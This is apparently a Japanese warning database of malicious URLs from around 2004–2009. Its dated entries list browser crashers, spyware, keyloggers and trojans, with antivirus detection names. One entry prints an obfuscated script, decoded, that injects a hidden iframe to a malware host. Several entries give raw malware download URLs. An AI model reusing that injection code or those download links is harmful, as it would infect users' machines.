| [2004/06/19] | //www.shylolita.biz/ に飛ぶが、環境によってはそこからさらに //commerce.trans-atlant.com/sodomon.html と、//vdylh.selfbookmark.info/enter.cgi?id=2046 に飛ぶ。 |
| [2005/04/13] | ウィルス名:ADW_SIDEFIND.A |
| [2005/11/24] | ウィルス名:ADW_SIDEFIND.C |
| [2006/07/09] | ウィルス名:ADW_SIDEFIND.C |
| [2006/07/09] | ウィルス名:ADW_SIDEFIND.C |
| [2005/11/24] | 踏むと こんな感じ のページを表示。このページは無害。何度確認しても検索窓が開いていて、「 siteFind 」という独自の検索窓であった。検索窓は普通に閉じることが出来て、ページ自体も普通に閉じれる。
しかし、ページ中央やや下よりの「 Download sideFind ! 」という名のボタン先はバスター反応。以下のURLがリンクされている。 //www.sidefind.com/ist/softwares/sidefind/sfsetup.exe |
| [2006/07/11] | ウィルス名:ADW_SIDESTEP.A |
| [2007/02/19] | ウィルス名:TROJ_NABLOAD.AD |
| [2009/01/04] | 「Certificado-3.3.15.exe」なるファイルが落ちてくるが、ウィルス名:MAL_BANKER を検出。 |
| [2009/01/04] | ファイルサイズ:358KB 。ウィルス名:MAL_BANKER |
| [2005/06/19] | ウィルス名:JAVA_BYTEVER.A。
別窓はこれ → //www.all-nude-celebs.net/?from=sitesell.biz ウィルス憑きURLを呼ぶ仕掛け部分は暗号化されていて、以下のように読めないように工夫されている。 <script language=javascript>eval(String.fromCharCode( 100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,34,60,105,102, 114,97,109,101,32,98,111,114,100,101,114,61,48,32,119,105,100,116,104, 61,48,32,104,101,105,103,104,116,61,48,32,115,116,121,108,101,61,39,100, 105,115,112,108,97,121,58,110,111,110,101,39,32,115,114,99,61,39,104,116, 116,112,58,47,47,99,111,111,108,119,101,98,115,101,97,114,99,104,120,46, 98,105,122,47,107,111,114,110,47,39,62,60,47,105,102,114,97,109,101,62,34,41))</script> ↑ 上を読めるようにすると下のようになる。 ↓ document.write("<iframe border=0 width=0 height=0 style='display:none' src='http://coolwebsearchx.biz/korn/'></iframe>") |
| [2005/08/19] | 改めて確認。踏むと//www.sitesell.biz/cgi-bin/tm3/mに飛ぶ。ここまでバスター無反応。
閉じるとランダムで色々なアダルトサイトを表示し、ウィルス名:HTML_REDIR.AI+JAVA_BYTEVER.A を検出。 |
| [2006/01/07] | 他の方の結果では、「Trojan-Downloader.JS.Agent.i など検出。」 |
| [2005/08/24] | ブラクラ体験室のブラクラ。 |
| [2005/06/20] | ギコナビのプレビュー表示で見ると海外女性の画像。直リンだと403。
直打ちで行くと//63.219.181.7/connect.php?did=od-padr95に飛び、何かをインストールしようとしてくる。 同時にウィルス名:SPYW_SMALL.AZ を検出。検出後、この小窓 を表示、「OK」を押すと再びウィルス名:SPYW_SMALL.AZ を検出。そして更に下のURLに飛ぶ。 //63.219.181.7/connect.php?did=od-padr95&attempt=1 上記で、何かをインストールしようとしてくる、その何かとは以下のcabファイル。 //63.219.181.7/cax.cab ← このURL解説も参照。 |
| [2004/12/02] | 直踏みでは洋エロ画像だがブラウザのセキュリティホールを突く悪質スクリプトがあるらしい。 |
| [2008/09/30] | ウィルス名:TROJ_AGENT.APMQ |
| [2008/06/29] | ウィルス名:TSC_GENCLEAN+VBS_PSYME.BPV
真っ白なページだが、ソースを見ると IFRAMEタグを使って以下のURLを呼び出している。 //www.skywebsv.com/Blog/index1.htm |
| [2008/10/16] | 真っ白なページ。バスター無反応だが、他社製ウィルス駆除ソフトでは反応があると思われる。 |
| [2008/06/29] | ウィルス名:TSC_GENCLEAN+VBS_PSYME.BPV
真っ白なページだが、ソースを見ると以下のファイルを放り込もうとしてくる。 //www.bluewoon.com/Blog/k1.exe |
| [2009/02/18] | ウィルス名:TROJ_INJECT.XZ |
| [2009/01/04] | 中国系サイト。真っ白なページだが、左上のほうに何かを呼び出している形跡がある。
バスター無反応だが、他社製アンチウィルスソフトでは反応があると思われる。 |
| [2009/04/13] | 真っ白なページだが、ウィルス名:TROJ_AGENT.AOLV を検出。 |
| [2009/04/13] | こんな感じ のサイトだが、ウィルス名:VBS_PSYME.CTE を検出。 |
| [2009/04/13] | 真っ白なページだが、ウィルス名:HTML_WEBKIT.AJ を検出。 |
| [2009/04/13] | 真っ白なページだが、ウィルス名:HTML_SHELLCOD.GD を検出。 |
| [2009/04/13] | ファイルサイズ:44.0 KB 。ウィルス名:TROJ_INJECT.AFI |
| [2008/10/05] | 真っ白なページだが、ウィルス名:JS_DLOADER.KDV を検出。
ソースを見ると、IFRAMEタグで以下のURLを呼び出している。 //www.bluewoon.com/web/index1.htm |
| [2005/10/22] | ウィルス名:TROJ_ISTALL.B |
| [2005/04/13] | ウィルス名:TROJ_ISTALL.B |
| [2005/10/22] | ウィルス名:ADW_CASNO.A |
| [2005/02/19] | ウィルス名:TROJ_SMALL.GL |
| [2005/04/13] | ウィルス名:TROJ_ISTBAR.DW |
| [2005/04/13] | ウィルス名:TROJ_ISTBAR.BX |
| [2005/12/04] | 再確認。ウィルス名:TROJ_ISTBAR.GG |
| [2006/11/11] | 再確認。ウィルス名:ADW_ISTBAR.NV |
| [2006/12/30] | 再確認。ウィルス名:ADW_ISTBAR.PU |
| [2005/06/07] | Slotchbarはスパイウェア。
ノートン、バスター共に無反応だが、Antidoteでウィルス反応があるらしい。 |
| [2006/01/25] | 他の方の結果は「Kaspersky反応あり。Trojan-Downloader.JS.IstBar.ai 検出。」 |
| [2006/07/27] | ウィルス名:TROJ_ISTBAR.GR |
| [2004/09/04] | ウィルス名:WORM_NETSKY.P |
| [2006/01/09] | 踏むと こんな感じ のページだが、何かをインストールしろ、と言ってくる。インストールを拒否すれば無害。
その「何か」とは以下のexeであり、そのexeからウィルス名:ADW_HOTBAR.H を検出する。 //installs.hotbar.com/installs/hotbar/programs/hotbar.cab |
| [2008/09/07] | ウィルス名:TSC_GENCLEAN+TROJ_AGENT.MSP |
| [2009/07/05] | DL+解凍すると「3522938.exe」ファイルが現れるが、ウィルス名:TSPY_MAGANIA.HZ を検出。
ファイルサイズ:42.1 KB 。 |
| [2006/01/29] | 下のzipファイルを落とそうとしてくる。スパイウェアである。
//www.brigsoft.com/bosswatcher/download/BossWatcherInst.zip |
| [2006/02/04] | 他の方の結果では「Kaspersky反応あり。Backdoor.Win32.Agent.gm 検出。」 |
| [2006/01/29] | スパイウェア配布サイト。こんな感じ のページで、このページ表示まで無害で、普通に閉じれる。
画面内の「click here to Download 」をクリックすると、「BossWatcherInst.zip」というファイルをDL出来るが、ディスクトップ画面をキャプチャして外部に送信するスパイウェアなので注意。 |
| [2006/02/04] | 他の方の結果では「Kaspersky反応あり。Backdoor.Win32.Agent.gm 検出。」 |
| [2005/12/10] | スパイウェア配布サイトと思われる。こんな感じ のサイト。このページ表示まで無害で、普通に閉じれる。詳細は こちら を参照。 |
| [2005/12/10] | ウィルス名:SPYW_ACTIVMON.A |
| [2005/11/07] | 「activmon.zip」というファイルが落ちてくる。DLまでバスター無反応だが、解凍するとウィルス名:SPYW_ACTIVMON.Aを検出。
exeが2つ入っているが、両方からウィルスを検出。exeの正体はスパイウェア:キーロガーである。 |
| [2006/08/11] | バスター無反応だが、他社製ウイルス駆除ソフトで反応する。
2006/07/30 にトレンドマイクロ社に「akeylogger.exe」ファイルを提出。 2006/08/07 にその連絡があり、その内容は以下。 「ご提供いただきましたファイルの解析を行わせていただきましたが、単体では不正な活動を行わないファイルであることが確認できました。 ご提供いただきましたファイルは、システム監視用プログラムとなり本ファイル自体は不正な活動等を行いません。 上記のことから、本ファイルがお客さまのコンピュータに不正なコードを追記する可能性はございませんが、他のプログラムと連携をとることによって不正な活動を行う可能性がございます。」 |
| [2005/04/13] | ウィルス名:SPYW_PCSPY.B |
| [2006/07/12] | 2006/07/02 にトレンドマイクロ社に「conn.exe」を提出。
今日、連絡があり。ウイルスパターンファイル「3.563.00」にて、「TROJ_DIALER.HY」として検出するよう対応したとのこと。 ウイルスバスターが実際に「conn.exe」に反応するか確認すると、ウィルス名:TROJ_DIALER.HY として検出することを確認。 |
| [2006/07/01] | Aforismi と言う外国語のサイト。
ActiveXをインストールするよう求めてきますし、サイト上側のリンクを押すとランタイムエラーで強制終了しますし、サイト中程でダウンロードできるconn.exeと言うファイルはスキャンにかけると ClamAV Dialer-646 Fortinet Dial/Chivio.AD TheHacker Posible_Worm32 VBA32 suspected of Trojan.StartPage.93 (paranoid heuristics) と言う結果で、複数のアンチウイルスソフトが有害判定を出しています。踏まない方が良いでしょう。 |
| [2006/07/12] | こんな感じ のサイト。ウィルス名:TROJ_DIALER.HY を検出。
よく見ると、左上のほうに何かを呼び出している形跡がある。 ソースを見ると以下のアプリケーションを実行しようとしていることが分かる。 //www.softlab.name/conn.exe ← ウィルス名:TROJ_DIALER.HY として対応。 |
| [2005/11/22] | 踏むと こんな感じ のサイト。このページ表示は無害で普通に閉じれる。
このサイトは いかにも「スパイウェアを駆除するソフト」を配布しているように見えるが、実際は「スパイウェアexe」を配布する。 |
| [2005/04/15] | ウィルス名:SPYW_EMAILOB.150 |
| [2005/11/07] | DLまでバスター無反応。解凍するとウィルス名:SPYW_EMAILOB.150 を検出。
zipファイルの中の「setup.exe」がウィルス名:SPYW_EMAILOB.150 の本体。 |
| [2005/04/15] | ウィルス名:SPYW_PCACME.630 |
| [2005/11/18] | ウィルス名:SPYW_KEYCOLEK.21 |
| [2006/05/27] | 再確認。バスター無反応だが、以下のアンチウィルスソフトで反応。
AntiVir → Dropper/Spy.PCspy.C.1 dropper BitDefender → Trojan.Spy.Pcspy.C Dr.Web → Trojan.KeyLogger.345 Fortinet → Spy/PCSpy Kaspersky → Trojan-Spy.Win32.PCspy.c VBA32 → Trojan-Spy.Win32.PCspy.c このexeはスパイウェアの中でも悪質なキーロガーであるが、そのキーロガーの中でも悪質な部類に入るものと思われる。 主な挙動は、 @、パスワードやキーストロークを記録する。 A、スクリーンショットを撮る。 B、完全に裏で動作するため、タスクの強制終了では終了できない。 |
| [2006/10/11] | 以下の「」内の他の方の結果を参照。
なお、 //www.sohbetchat.tc/giris.hta はトレンドマイクロ社に提出して調査依頼中。 「ページ内のでかいアルファベット?がリンクになっていてそこから「Trojan-Downloader.JS.gen」を検出。 内容はhtmでPariteに感染させるのが目的の模様。大抵のアンチウイルスで検出できるはず。 後、裏で膨大な数のバナーを貼り付けたページを呼ぶのでPC重くなる。 あやしいIRCクライアント配布しているリンクもあったので近づかないほうがいいね。」 「PC有害。今までつながりませんでしたが、10時頃つながりました。 送られて来た giris.hta より、Generic.XPL.ADODB.EF69903E を Bitdefender が検出。」 「URLを踏んだとたんにgiris.htaというファイルを送りつけてきました。開こうとしましたがノートンが悪質なスクリプトが有るって遮断しました。」 |
| [2006/10/13] | 2006/10/08 にトレンドマイクロ社に提出。
今日、その結果の連絡があり、ウィルス名:VBS_SUZER.E として検出するよう対応、とのこと。 実際に 2006/10/08 にDLしたファイルからウィルス名:VBS_SUZER.E を検出することを確認。 しかし、今日改めて当該URLからDLしてみるとバスター無反応。 新しいファイルに置き換えられている可能性がある。 |
| [2006/10/19] | 2006/10/14 にトレンドマイクロ社に再提出。
今日、その結果の連絡があり、ウィルス名:VBS_IWILL.B として検出するよう対応、とのこと。 実際に 2006/10/14 にDLしたファイルからウィルス名:VBS_IWILL.B を検出することを確認。 しかし、今日改めて当該URLを確認してみると404であった。 |
| [2005/08/12] | 無限ループ。 |
| [2005/10/18] | − 以下は他の方の結果を編集記載 −
ギコから直踏み→IEで開くと、ブラウザの窓が49個開く。無限増殖ではなく、開くのが止まってからひとつずつ閉じていくと、「ブラクラ実験」というページが残った。根本的にはPC無害だろうが、マシンスペックによっては固まる恐れもあるだろう。 |
| [2006/05/04] | 他の方の結果は以下の「」内。
「フロッピーアタック&ウインドウオープンイッパイのブラクラでした。 危険URLリストに、49個ウインドウが開くとウインドウオープンが止まるということなので49個開いてみました。 そこまでウイルス反応はありませんでした。」 |
| [2004/08/21] | FDDアタック。誰かのプロフィールページのようだがリホモを抜かれて晒される。 |
| [2008/10/04] | ウィルス名:PAK_Generic.001 |
| [2008/10/04] | ウィルス名:MAL_OLGM-15 |
| [2008/10/04] | ウィルス名:CRYP_MANGLED |
| [2008/10/04] | ウィルス名:PAK_Generic.001 |
| [2008/10/04] | ウィルス名:MAL_OLGM-15 |
| [2008/10/04] | ウィルス名:PAK_Generic.001 |
| [2008/10/04] | ウィルス名:MAL_OLGM-15 |
| [2008/10/04] | ウィルス名:PAK_Generic.001 |
| [2008/10/04] | ウィルス名:MAL_OLGM-15 |
| [2008/10/04] | ウィルス名:PAK_Generic.002 |
| [2008/10/04] | ウィルス名:CRYP_MANGLED |
| [2008/10/04] | ウィルス名:TROJ_ZLOB.BCK |
| [2008/10/04] | ウィルス名:CRYP_MANGLED |
| [2004/10/24] | ウィルス名:HTML_RIDER.A+JAVA_BYTEVER.A-1 |
| [2005/11/24] | ウィルス名:ADW_SPEDIA.215 |
| [2005/04/01] | 踏むと こんな感じのサイト だが、ウィルス名:JAVA_BYTEVER.A を検出。 |
| [2005/04/15] | ウィルス名:DIAL_FU.A |
| [2006/08/02] | ウィルス名:DIAL_SYSWEBTEL.A |
| [2005/04/15] | ウィルス名:DIAL_SYSWEBTEL.A |
| [2005/04/15] | ウィルス名:DIAL_FU.A |
| [2006/08/02] | ウィルス名:DIAL_FU.A |
| [2006/05/03] | スパイウェア駆除を装った「偽装アンチスパイウェア駆除ソフト」と思われる。
こんな感じ サイトで、このページ表示まで無害で普通に閉じれる。 画面内の「DOWNLOAD」をクリックするとこのページ を表示し、「shield-setup.exe」なるファイルをDLしろ、と催促してくる。 しかし、このexeから Fortinet で Adware/SpyShield を検出。 |
| [2005/12/27] | ウィルス名:SPYW_PDESK.210+SPYW_FAMKEY.283 |
| [2005/12/27] | スパイウェア配布サイトのページ。こんな感じ のページで、このページ表示まで無害で、普通に閉じれる。
このページでは、様々な種類のスパイウェアファイルがDL出来る。 |
| [2005/04/15] | ウィルス名:SPYW_GOLDKEY.126+SPYW_FAMKEY.280 |
| [2006/06/17] | 再確認。DL+解凍すると「FamilyKeyLogger-setup.exe」が現れる。
バスター無反応だが、以下のアンチウィルスソフトで反応。キーロガーに属するものと思われる。 BitDefender → Application.Keylog.Family.A Fortinet → W32/FamilyKeyLogger Kaspersky → not-a-virus:Monitor.Win32.FamilyKeyLogger.280 McAfee → potentially unwanted program Keylog-Family |
| [2005/12/27] | ウィルス名:SPYW_INET.120+SPYW_FAMKEY.283 |
| [2005/12/27] | ウィルス名:SPYW_HKLOG.170+SPYW_FAMKEY.280 |
| [2005/11/16] | 圧縮ファイルが落ちてくるが、ウィルス名:SPYW_GOLDKEY.126+SPYW_FAMKEY.280 を検出。 |
| [2005/12/27] | ウィルス名:SPYW_TELSPY.300 |
| [2005/12/09] | スパイウェア配布サイトと思われる。こんな感じ のサイトで、このページ表示まで無害で普通に閉じれる。
画面右寄りの「FREE DOWNLOAD」をクリックすると下のexeがDL出来る。 このアプリケーションにはバスター無反応だが、スパイウェア:SPYAXE と思われる。 インストールするとトロイの木馬が数種紛れ込むらしい。 //download.spyaxe.com/downloads/1/spyaxe_setup.exe |
| [2005/12/29] | バスター無反応だが、UNA で Backdoor.Agent を検出。 |
| [2007/03/22] | 「sd_setup.exe」なるファイルが落ちてくる。ファイルサイズ:3.17MB
バスター無反応だが、以下のアンチウィルスソフトで反応。 AntiVir → ADSPY/Qworke.A BitDefender → Adware.SpyHeal.D Kaspersky → not-a-virus:FraudTool.Win32.SpyHeal.a Webwasher-Gateway → Ad-Spyware.Qworke.A |
| [2006/05/06] | スパイウェア配布サイトと思われるが、それを堂々と商売としているらしい。
こんな感じ のサイトで、このページ表示まで無害で普通に閉じれる。 このページの下のほうにある「Download」をクリックすると こんな感じ のページを表示する。 このページからDL出来るexeはスパイウェアの中でも悪質なキーロガーに属するものと思われる。 |
| [2006/05/06] | バスター無反応だが、以下のアンチウィルスソフトで反応。
AntiVir → Backdoor-Server/Spymon.2 backdoor Fortinet → BDoor.CTQ!tr.bdr VBA32 → Malware.Agent.164 |
| [2005/06/20] | 「Install.exe」という名のファイルが落ちてくる。
バスター無反応だが、以下のアンチウィルスソフトで反応。 アンチドート → not-virus:Hoax.Win32.Renos.b Kaspersky Anti-Virus → not-virus:Hoax.Win32.Renos.b NOD32 → Win32/Adware.SpySheriff application これをインスールすると、CoolWebSearchも付属で付いてくるらしい。 |
| [2005/08/08] | 「Install.exe」が落ちてくるが、スパイウェア駆除を装ったスパイウェア。
スキャンしたところ、McAfeeがpotentially unwanted program Adware-SpySheriffを検出。 |
| [2006/01/20] | 他の方の結果は以下の「」内。
「実行ファイル「Install.exe」がDLされます。おそらくウイルスではないと思うのですが、信頼できないなら絶対に実行しないでください。」 |
| [2006/01/20] | 「Spysheriffはマルウェアなので有害。怪しいソフトウェアは一度落としてオンラインスキャン掛けるかファイル名をググった方がいい。」 |
| [2005/11/24] | ウィルス名:SPYW_SPYSHDW.100 |
| [2006/07/30] | ウィルス名:SPYW_AOLSPY.A |
| [2004/08/28] | 「SpywareStormer」というスパイウェアのオンラインスキャンが無料で出来るサイトらしいが、ここはスパイウェア駆除を装ったスパイウェアらしく、注意が必要。直踏みだとexeをDL。 |
| [2004/08/30] | spywarestormer自体をad-awareがスパイウェアとして検知するらしい。
-----spywarestormerを実際に踏んで実験してみました-----(鑑定結果引用) ad-awareが反応することが判っているTracking Cookieを積んだ状態で、ad-awareとstormerのスキャンをかけ比べました。 すると、ad-awareが検知したクッキーと同じものをstormerも検知しました。 ということはstormerはスキャナとしては本物ということになります。ただし、ad-awareが捕捉しなかったものにも反応していました。 レジストリを探してみましたが、それらに該当しそうなものは見当たりませんでした。 で、いざ除去という段階で、stormerはカネを要求してきました。「無料スキャン」なだけで「除去」は有料らしい。 stormerが侵入していると、時折英語で「もしあなたのCPが遅くなっているのならスパイウェアに感染した恐れがあります。 下の「Yes」をクリックしてください。」との表示が現れ、「Yes」をクリックしても「No」をクリックしてもstormer社のページに飛んでstormerを買わせようとする。 以上のことから、これは悪質なスパイウェア(malware)というよりも広告を出すスパイウェア(adware)なのでしょう。 |
| [2005/01/22] | spyware stormerというサイト。Scanをクリックすると、署名の承認が出る。
「はい」をクリックすると、自動でダウンロード→インストール→プログラム実行される。 すべてスキャンし終わった後に、シリアルを要求。シェアウェアのようで使用する価値は無し。 -----spyware stormerについて----- ・無料でDLできるソフト部分は検査だけでおまけとして広告が付いてくる。 ・スパイウェア、アドウェアを消去したい場合は有料の29.95ドルを支払いなさいと言われ、その他一部の情報が、勝手に送信されるらしい。 単純にプログラムの追加と削除からspyware stormerを消去できるか確認。 海外の評価文章では取り除くにはパソコンを再セットアップインストールの方法しかなかったような文しか見当たらなかった。製品評価はあまり良くない。 「spyware stormer」をインストールしたフォルダに「Uninst.exe」というファイルがあればダブルクリックして実行してみてください。一応、これがアンインストーラー。 その後「HijackThis」でスキャンして下記項目があれば左端のチェックボックスにチェックをいれ、「Fix checked」をクリック。 O4 - HKLM\..\Run: [Spyware Stormer] C:\Program Files\Spyware Stormer\SpywareStormer.Exe O16 - DPF: {205FF73B-CA67-11D5-99DD-444553540000} (CInstall Class) - |
| [2006/11/27] | ウィルス名:ADW_SPYSTORMER.A |
| [2005/10/06] | ファイルサイズ:153KB 。このexeにはバスター無反応だが、スパイウェアの一種:アドウェアが含まれている。 |
| [2006/01/13] | こんな感じ のスパイウェア配布サイト。このページ表示まで無害で、普通に閉じれる。
スパイウェア名:Spyaxe と何か関連がありそうなので注意。Spyaxe は 最新のスパイウェアで、ほとんどのアンチウィルスソフトを通過してしまう。それに似たものと思われる。 |
| [2006/08/24] | ウィルス名:TROJ_SQUIRE.B |
| [2007/05/20] | 解凍すると以下の4つのファイルが現れる。
2006/10/18 にトレンドマイクロ社に各ファイルを提出。 2006/10/24 にその結果の連絡があり、以下のように検出するよう対応、とのこと。 SQLoader.dll → ウィルス名:TROJ_SQUIRE.B SQLoader.exe → ウィルス名:TROJ_SQUIRE.B cucr.exe → ウィルス名:TROJ_Generic tetra.dll → ウィルス名:TROJ_WREN.E 2006/10/18 にDLしたファイルが手元に無いため、実際に検出対応したかどうかは未確認。 しかも、今日改めて当該URLを確認してみると、404 になっていた。 |
| [2008/10/08] | ウィルス名:TROJ_PAKES.LW |
| [2008/10/08] | ウィルス名:TSPY_SMALL.FPR |
| [2008/10/08] | ウィルス名:SPYWARE_TRAK_SPYAGENT |
| [2008/10/08] | ウィルス名:TROJ_GENERIC.A |
| [2008/10/08] | ウィルス名:TROJ_AGENT.WGM |
| [2008/10/08] | ウィルス名:TROJ_AGENT.AIYG |
| [2008/09/30] | 真っ白なページだが、ウィルス名:JS_PSYME.BUD を検出。 |
| [2008/09/30] | DL+解凍すると「mm.exe」が現れるが、ウィルス名:WORM_DLOADER.RRD を検出。 |
| [2008/09/30] | 真っ白なページだが、ウィルス名:JS_REAPLAY.B を検出。 |
| [2005/05/24] | ウィルス名:HTML_MHTREDIR.BI+JAVA_BYTEVER.A |
| [2004/09/08] | ウィルス名:VBS_HOMEPAGE.A |
| [2004/08/21] | ウィルス名:WORM_CULT.B |
| [2006/10/07] | ウィルス名:DIAL_STARDIAL.B |
| [2005/11/27] | スパイウェア配布サイトと思われる。こんな感じ のページで、このページ表示まで無害。普通に閉じれる。
このページでは、普通に検索できる。適当に言葉を入力して検索してみたが、検索には何も問題無いと思われる。 その下のツールバーに問題がある。踏むと //toolbar.startnow.com/ にリンクされていて、「SNToolbar.msi」をDL出来るが、ウィルス名:ADW_HYPERBAR.A を検出。 |
| [2005/12/19] | スパイウェア配布サイトのページ。踏んだ直後は こんな感じ だが、ダイアログを表示し、それを拒否すると こんな感じ に変わり、「Starware_305.exe」なるものをDLしろ、と言ってくる。
このexeから、スパイウェアの一種:アドウェア「Adware.Starware」を検出。 |
| [2007/01/14] | ウィルス名:TROJ_Generic.Z |
| [2007/05/19] | 2007/01/13 にトレンドマイクロ社に上記2つのファイルを提出。
2007/01/19 にその結果の連絡があり、2つのファイルともウィルス名:TROJ_INJECT.L として検出するよう対応、とのこと。 実際に 2007/01/13 にDLしたファイルと、今日改めてDLしたファイルからウィルス名:TROJ_INJECT.L を検出することを確認。 2007/01/13 から今日までのファイルの置き換えは無いと推測される。 |
| [2009/04/18] | 確認してみると、1回目はヤフーのトップページに飛ばされる。
2回目以降の確認では FDDアタック のブラクラが発動されるようであるが、Vista環境では無害と思われる。 こんな感じ のページ。このページの下のほうは こんな感じ になっている。 ここ の下の赤枠内の部分にアクセスした人のリモートホストが表示されるようになっている。 |
| [2007/04/08] | 海外アダルトサイトだが、ウィルス名:EXPL_ANICMOO.GEN+EXPL_WMF.GEN を検出。 |
| [2006/01/10] | 海外アダルトサイトで、ウィルス名:VBS_PSYME.AN+JAVA_BYTEVER.A を検出する。 |
| [2004/10/01] | 海外の検索サイトらしいがポップアップ多数、スタートページも変えようとする。
あなたのパソコンはスパイウェアに感染してるかも。スキャンしますか?と出てきてスキャンするにしたら色々出てくる。少し挙動がおかしいところあり。 |
| [2004/10/12] | 検索サイトのような所に飛ぶ。そのページを閉じるとなぜか大きさが変えられない小さなウィンドウが出たり、スパイウェアのインストールがあったりする。 |
| [2005/03/26] | ウィルス名:TROJ_WREN.E |
| [2005/03/26] | ウィルス名:TROJ_WREN.E+TROJ_WREN.F |
| [2005/03/26] | ウィルス名:TROJ_WREN.E |
| [2006/07/20] | 2006/07/12 にトレンドマイクロ社にファイルを提出。
本日、連絡があり、スパイウェアパターンファイル 0.391.00 にてウィルス名:DIAL_DIALER.HW として対応とのこと。当ファイルをDLしてウィルスを検出することを確認。 |
| [2006/07/20] | 他の方の結果では、
「avast4.7 で Win32:Dialer-622 [Trj] と判定。 bitdefender で Trojan.Dialer.CJ と判定。」 |
| [2007/04/22] | 再確認。ウィルス名:Dialer_Dialxs |
| [2007/01/14] | ウィルス名:TROJ_CJ.A |
| [2007/01/14] | ウィルス名:DIAL_RASDIAL.C |
| [2007/01/19] | 2007/01/13 にトレンドマイクロ社にファイルを提出。
今日、その結果の連絡があり、ウィルス名:DIAL_INFECTED.BC として検出するよう対応、とのこと。 実際に 2007/01/13 にDLしたファイルと、今日改めてDLしたファイルからウィルス名:DIAL_INFECTED.BC を検出することを確認。 2007/01/13 から今日までのファイルの置き換えは無いと推測される。 |
| [2007/01/19] | 2007/01/13 にトレンドマイクロ社にファイルを提出。
今日、その結果の連絡があり、ウィルス名:DIAL_DIALER.MS として検出するよう対応、とのこと。 実際に 2007/01/13 にDLしたファイルと、今日改めてDLしたファイルからウィルス名:DIAL_DIALER.MS を検出することを確認。 2007/01/13 から今日までのファイルの置き換えは無いと推測される。 |
| [2002/11/26] | //www.raus.de/crashme/に飛ぶ。 |
| [2004/06/15] | 一旦、//210.150.243.7/cgi-bin/2/bbs.cgiに飛ばされるが、その後すぐ//www2.strangeworld.org/uedakana/sahra1354.htmlに飛ばされる。 |
| [2006/09/22] | 2006/09/19 にトレンドマイクロ社にファイルを提出。
今日、その結果の連絡があり、ウィルス名:TROJ_ZLOB.AJE として検出するよう対応、とのこと。 2006/09/19 にDLしたファイルからウィルス名:TROJ_ZLOB.AJE を検出することを確認。 しかし、今日改めて当該URLからDLしてみるとバスター無反応。 恐らく、新しいファイルに随時置き換えられるURLと推測される。 |
| [2005/03/13] | ウィルス名:JAVA_BYTEVER.A |
| [2007/03/14] | 2007/01/26 にトレンドマイクロ社にファイルを提出。
2007/02/09 にその結果の連絡があり、ウィルス名:TSPY_BANKER.FJH として検出するよう対応、とのこと。 実際に 2007/01/26 にDLしたファイルと、今日改めてDLしたファイルからウィルス名:TSPY_BANKER.FJH を検出することを確認。 2007/01/26 から今日までのファイルの置き換えは無いと推測される。 |
| [2004/11/21] | スパイウェアの可能性。踏むと このgif画像 参照、これを表示。
また、タスクバーにしか存在しないページ?があり、何回目かの強制終了で脱出。 |
| [2004/08/14] | ウインドウが激しく点滅して動き回り、一時静止して怖い顔が映し出される。Alt+F4で脱出。
実際に踏むとブラウザが全画面表示され、クリックすると色々な画像(キノコ雲、虫等)が表示される。もう一度踏むと、また違った画像が表示される。 |
| [2004/10/31] | まずIEで見るとウィンドウサイズが勝手に変えられるので注意。
真ん中に表示されるsubculture.comをクリックすると全画面で音楽と共にマッチョな奴がキョロキョロ動くFLASHが再生。Alt+F4で脱出。無害だが音がいきなり大きくなるので注意。 |
| [2008/08/09] | こんな感じ のサイトだが、ウィルス名:TSC_GENCLEAN+VBS_LOVELETTE.Y を検出。
2回目の確認ではウィルス名:TSC_GENCLEAN のみを検出して以下のサイトに飛んだ。 //www.subculture.com/666.html ← こんな感じ のサイト。 |
| [2004/03/16] | ウィンドウがクネクネ変形するブラクラ。Alt+F4で脱出。 |
| [2004/06/20] | ウィンドウがディスクトップを飛び回る。Alt+F4などで対処可能。 |
| [2004/09/28] | 開くと色々クリックがあり、クリックしていくとトントントントントントンという音が出て、モザイクっぽいところに出るところがあるが、そこのまま消すと音が流れっぱなしになる。そして、そこの先はクリックするとブラクラになる。 |
| [2004/05/17] | エロ画像が飛び回るブラクラ。脱出はタスクマネージャやAlt+F4連打で可能。 |
| [2004/06/19] | 色々なサイトに飛ぶがそのたびにループタグや逃げウィンドウを食らう。
ずっと飛んでいくとまた1回飛んだサイトに戻り、それの繰り返し。 |
| [2004/07/15] | 揺れている画像をクリックするとウィンドウが無限に開く。 |
| [2005/01/07] | 「Loading images... Please wait」と これだけ表示される。下のスクリプトがページエラーで止まる。
open("http://69.50.160.98/affiliates/load.php?id=acc0000document.location.href="prepare.html 直踏みしてみたら avast! が IFrameExpioit ウィルス検出。 |
| [2005/01/07] | 私の環境では踏むとページをいくつか飛ばされてHDDが唸り出し、ウィルス名:JS_DRAGDROP.GEN+JAVA_BYTEVER.A を検出。別窓も何枚か表示。それを閉じると全画面表示もあり。
別窓の中に こんな警告 を表示するページもあり。 また、「HAYTER MERCHANTS INC.」なる名の//www.awmdabest.com/cabl/987/tb.cabをインストールしろ、というセキュリティ警告あり。 |
| [2005/05/28] | 無限ループ。mailtoストーム。FDDアタック。Telnetストーム。
IFRAMEタグを1000個以上使い、www.yahoo.com***(***は数字)をアウトルックやTELTETで呼び出す。 |
| [2005/06/04] | 無限ループ。FDDアタック。 |
| [2005/06/04] | JPG偽装ブラクラ。インターネット接続ウイザードが多数立ち上がる。
FRAMEタグで/fdd.htm , /index.jpg , /ldap.htm , /mail.htm , /news.htm , /source.htm , /telnet.htmの各ページを呼び出す。 |
| [2005/06/04] | ブラウザフリーズ。 |
| [2005/06/04] | 無限ループ。mailtoストーム。 |
| [2005/06/04] | インターネット接続ウィザードが多数起動する。 |
| [2005/06/04] | ソースストーム。 |
| [2005/06/04] | Telnetストーム。 |
| [2004/10/24] | ウィルス名:JS_SMALL.D |
| [2006/10/09] | ウィルス名:TROJ_AGENT.AQF+ADW_CLICKER.FS |
| [2006/11/11] | SACC.PROD.V1178.08MAI2006.EXE[1] というファイルが落ちてくるが、ウィルス名:ADW_SURFACCU.J を検出。 |
| [2005/12/23] | スパイウェア配布サイトと思われる。こんな感じ のサイトで、このページ表示まで無害で、普通に閉じれる。
画面の下のほうの「Click Here !」をクリックすると下のファイルがDL出来る。 //www.surfsidekick.com/SurfSidekick.exe |
| [2005/12/23] | バスター無反応だが、以下のアンチウィルスソフトで反応。
